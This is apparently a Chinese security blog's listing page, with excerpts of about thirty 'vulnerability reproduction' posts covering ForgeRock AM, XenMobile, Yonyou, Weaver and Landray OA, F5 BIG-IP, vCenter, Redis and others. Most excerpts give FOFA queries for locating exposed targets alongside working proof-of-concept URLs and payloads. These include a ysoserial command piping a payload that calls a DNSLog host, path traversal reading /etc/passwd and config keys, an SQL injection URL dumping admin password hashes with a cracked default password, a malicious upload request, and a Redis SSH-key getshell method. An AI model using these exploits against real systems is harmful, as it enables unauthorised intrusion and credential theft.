自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(34)
  • 收藏
  • 关注

原创 ForgeRock AM远程代码执行漏洞(CVE-2021-35464)漏洞复现

文章目录fofa搜索语句漏洞复现poc(DNSLog检测)EXPfofa搜索语句app="OpenAM"漏洞复现poc(DNSLog检测)https://github.com/frohoff/ysoserial使用工具生成payloadjava -jar ysoserial.jar Click1 "curl http://ykmvp3.dnslog.cn" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '.

2021-07-02 16:30:25 2474

原创 XenMobile目录遍历任意文件读取(CVE-2020-8209)

XenMobile目录遍历任意文件读取(CVE-2020-8209)利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。不需要授权。POC(路径遍历)/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd解密配置密码读取配置/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties 密码已加密并以

2020-11-17 22:40:31 2994 4

原创 Spring Boot Actuator未授权访问远程代码执行_eureka_XStream反序列化

文章目录漏洞复现扫描探测RCE(1)编写利用脚本(2)设置 eureka.client.serviceUrl.defaultZone 属性(3)触发(4)恢复 eureka.client.serviceUrl.defaultZone漏洞复现扫描探测使用的工具为:SB-Actuator使用工具扫描发现目标地址存在Spring Boot Actuator未授权访问,可导致XStream反序列化RCE。RCE(1)编写利用脚本执行的命令为ping DNSlog#!/usr/bin/env pyt

2021-07-16 17:02:34 3883

原创 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

0X00漏洞描述用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限0X01漏洞复现fofa搜索FOFA: icon_hash="1085941792"访问页面存在漏洞URL/servlet/~ic/bsh.servlet.BshServlet命令执行...

2021-06-01 19:19:06 2633 1

原创 蓝凌OA SSRF+JNDI远程命令执行

漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限FOFAapp=“Landray-OA系统”漏洞复现利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件/WEB-INF/KmssConfig/admin.properties发送请求包POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host:

2021-05-13 21:07:21 4351

原创 VoIPmonitor 远程命令执行漏洞( CVE-2021-30461)

漏洞描述VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。漏洞影响VoIPmonitor < 24.60fofa搜索语法FOFA: “VoIPmonitor”漏洞复现登录页面发送post请求包POST /index.php HTTP/1.1Host: User-Agent: Moz

2021-05-08 17:13:23 855

原创 和信创天云桌面系统_命令执行_任意文件上传

fofatitle=“和信下一代云桌面VENGD”漏洞复现POST /Upload/upload_file.php?l=test HTTP/1.1Host: X.X.X.XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="1

2021-04-12 03:37:15 930

原创 齐治堡垒机_任意用户登录漏洞

fofa查询语法app=“齐治科技-堡垒机”漏洞复现漏洞POC为http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

2021-04-12 03:30:15 1918 1

原创 泛微_OA_V8_SQL注入漏洞

fofaapp="泛微-协同办公OA"POChttp://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20idEXPhttp://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManagerMD5解码使用账号sysadmin/Magimix123

2021-04-09 04:20:18 1199 1

原创 MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)

0x01 前言MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。0x02 漏洞影响攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。0x03 fofa查询语句title="MessageSolution Enterprise Email Archiving (EEA)"0x04 漏洞复现访问网站页面如图payloadhttp://ip/authe

2021-03-30 01:03:19 645 4

原创 Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

漏洞背景Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。目前互联网已公开漏洞poc,建议相关用户及时采取措施阻止攻击。fofa查询app="APACHE-Solr"影响范围Apache Solr 所有版本漏洞复现首先访问,获取实例对象的名称,实例对象的名称为 gastearsivi/solr/admin/cor

2021-03-19 17:01:01 885

原创 F5 BIG-IP iControl RCE (CVE-2021-22986)

漏洞描述F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。3、CVE-2021-22988 BIG

2021-03-19 13:20:39 2530 8

原创 锐捷RG-UAC上网行为管理信息泄漏漏洞

漏洞简介锐捷RG-UAC上网行为管理信息泄漏漏洞,可在登陆界面源码中查找管理员用户和密码.影响范围锐捷RG-UAC上网行为管理与审计系统fofa查询title="RG-UAC登录页面" && body="admin"漏洞利用前端查看源码,搜索admin即可发现MD5加密的密码通过解密成功登陆...

2021-03-17 13:29:47 1502

原创 Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)

背景CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。影响版本vmware:esxi:7.0/6.7/6.5vmware:vcenter_server:7.0/6.7/6.5漏洞复现fofa查询语法:title="+ ID_VC_Welcome +"POChttps://x.x.x.x/ui/vropspluginui/rest/services/uplo

2021-02-25 18:45:27 4632 2

原创 Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)前言Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。影响版本Nexus Repository Manager OSS/Pro 3.6.2版本-3.14.0版本漏洞复现未授

2021-02-24 14:46:57 175

原创 Apache Druid远程命令执行漏洞复现(CVE-2021-25646)

漏洞概述Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。影响版本Apache Druid < 0.20.1漏洞复现访问8888端口,进入Apache Druid首页:点击左上方Load data,在点击Local disk,再点击右

2021-02-05 23:46:42 545

原创 ThinkAdmin任意文件读取漏洞(CVE-2020-25540)

简述ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统漏洞描述ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。漏洞复现fofa搜索语句 app="ThinkAdmin"POCPOST /admin/login.html/?s=admin/api.Update/node HTTP/1.1Host: 127.0.0.1Content-Length: 21Cach

2021-02-04 21:50:48 780

原创 CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

漏洞描述Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址

2021-02-02 14:55:00 869

原创 weblogic反序列化漏洞(CVE-2017-10271)

受影响版本受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0漏洞利用1:初步判断访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞2:构造POST包进行测试,写入test.txtPOST /wls-wsat/CoordinatorPortType HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Win

2021-01-29 14:21:34 210

原创 众安天下众测平台邀请码获取

众安天下众测平台邀请码获取之前获得邀请码做的一个小游戏,简单记录一下。小游戏获取通过注册页面,如何获取获取邀请码,找到游戏入口。目录遍历http://119.3.191.245:8877/info.phphttp://119.3.191.245:8877/Login.php使用匹配返回包内容进行爆破爆破用户名admintest爆破密码test/test123然后登陆test 发现aid可以遍历,尝试sql注入无果继续翻发现有个下一节,多了个参数,继续爆破,注意参数为

2021-01-25 14:50:39 3124

原创 致远OA-ajax.do任意文件上传漏洞

致远OA-ajax.do任意文件上传漏洞漏洞描述致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁。鉴于漏洞危害较大,建议用户尽快应用补丁更新。漏洞影响版本致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6

2021-01-14 17:07:07 9150 4

原创 利用Redis未授权漏洞实现getshell

(1)写ssh-keygen公钥然后使用私钥登陆在以下条件下,可以利用此方法Redis服务使用ROOT账号启动服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。1:本地建立ssh的密钥ssh-keygen -t rsaGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsaEnter passphrase

2021-01-12 18:07:08 562

原创 Apache Flink目录遍历漏洞通过REST API读/写远程文件(CVE-2020-17518&&CVE-2020-17519)

fofa搜索app=“APACHE-Flink”漏洞编号:CVE-2020-17518,CVE-2020-17519漏洞描述:CVE-2020-17518:通过REST API写入远程文件受影响的版本:Flink 1.5.1-1.11.2Flink 1.5.1引入了REST API,可通过恶意修改的HTTP HEADER,将任意文件复制到文件系统的任意位置。CVE-2020-17519:通过REST API读取远程文件受影响的版本:1.11.0、1.11.1、1.11.2Apache

2021-01-06 13:15:22 703

原创 SolarWinds Orion API 远程代码执行漏洞(CVE-2020-10148)

漏洞简述SolarWinds 发布了 SolarWinds 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-10148,漏洞等级:高危。SolarWinds公开了供应链攻击之外的一处漏洞。该漏洞允许未授权的攻击者在受影响的SolarWinds系统上执行任意代码。漏洞详情SolarWinds Orion 平台中存在一处权限绕过漏洞。攻击者通过访问,绕过权限验证。最终通过访问功能性API,导致远程代码执行。影响版本solarwinds:orion:<2020.2.1HF2solar

2020-12-31 16:23:27 2540

原创 Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

fastjson简介      fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。影响范围      fastjsonfastjson<=1.2.24漏洞复现使用vulhubcd /app/vulhub-20201028/fastjson/1.2

2020-12-28 13:48:01 1524

原创 Struts2 S2-061漏洞复现(CVE-2020-17530)

0x01 漏洞描述Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。0x02 漏洞影响struts 2.0.0 - struts 2.5.250x03 漏洞复现一.环境搭建1.docker环境地址:https://github.com/vulhub/vulhub/tree/mast

2020-12-22 09:48:09 562

原创 SICKOS: 1.2

#1寻找目标nmap -sS -O 192.168.1.0/24确定ip 192.168.1.124#2扫描端口nmap -sS -O -sV 192.168.1.124发现开放80端口,从web入手。#3寻找入口查看源代码,没东⻄。扫描一下目录访问瞅瞅,注意到lighttpd/1.4.28找找有没有能利用的,没有发现能利用的使用nikto扫描一下,看到一些信息nikto -host 192.168.1.124nmap看一下http中开启的methods方法,有个pu

2020-12-18 13:28:35 371

原创 Kioptrix 2014 (#5)

目标:Kioptrix 2014 (#5)攻击机:kali(192.168.1.107)网关:192.168.1.255#1端口探测nmap 192.168.1.159 -O -sV -sS-O 系统探测-sV 探测开启的端口来获取服务、版本信息-sS 使用SYN扫描#2访问80和8080端口查看网页源代码访问http://192.168.1.159/pChart2.1.3/examples/index.php找一下Navigation漏.

2020-12-11 13:09:21 556 1

原创 JBoss Application Server 反序列化漏洞

JBoss Application Server 反序列化漏洞CVE-2017-12149http://192.168.11.123:8080/invoker/readonly1:执行生成二进制的payload文件javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java2:修改接受shell的主机IP和端口java -cp .:commons-collections-3.2.1.ja

2020-12-11 13:00:43 261

原创 Kioptrix Level 1(#1)

Kioptrix Level 1(#1)目标:Kioptrix Level 1(VMware)攻击机:kali(192.168.43.80)网关:192.168.43.255#1查看Kioptrix在内网的ip地址nmap 192.168.43.0/24 -n -sP -sn-n 不做DNS解析-sP ping扫描-sn 不做端口扫描得到ip192.168.43.36#2查看端口开放情况(nmap)nmap 192.168.43.36 -O -sS -sV-O

2020-12-08 14:52:30 496

原创 UEditor .Net版本任意文件上传漏洞

UEditor .Net版本任意文件上传漏洞一、漏洞介绍Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。Crawler方法对source[]的检查仅仅是一个ContentTypeif (response.ContentType.IndexOf("image") == -1){State = "Url is not an image";re

2020-12-04 14:46:08 1201

原创 泛微云桥e-Bridge任意文件读取

泛微云桥e-Bridge任意文件读取漏洞0x00漏洞影响版本:该漏洞几乎影响2018-2019全版本。0x01漏洞利用:默认密码sysadmin/1fofa搜索语句:title=“泛微云桥”主要成因/wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件构造如下语句http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/

2020-11-28 19:50:41 4038 2

原创 Kibana远程代码执行漏洞(CVE-2019-7609)

Kibana远程代码执行漏洞(CVE-2019-7609)漏洞简介2019年2月官方发布公告称Kibana存在远程代码执行漏洞,5.6.15 和 6.6.1之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷,导致攻击者可在服务器上利用Kibana执行任意代码。Kibana 是 Elasticsearch 的开源数据可视化插件。它为Elasticsearch提供可视化功能,可以用来搜索和查看存储在Elasticsearch索引中的数据,并可以将数据以各种图标、表格和地图的形式进行可视

2020-11-24 19:52:19 776

原创 用友grp-u8SQL注入&命令执行

用友grp-u8SQL注入&命令执行fofa搜索语句 title=“GRP-U8”1、查询版本信息:select @@version2、验证是否为sa权限:select IS_SRVROLEMEMBER(‘sysadmin’) //返回 1,说明是sa权限,可执行sql语句。 3、判断目标机的MSSQL服务是否存在xp_cmdshell扩展存储过程:select count(*) from master.dbo.sysobjects where xtype=‘x’ and name=‘xp_

2020-11-20 20:22:27 5622

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除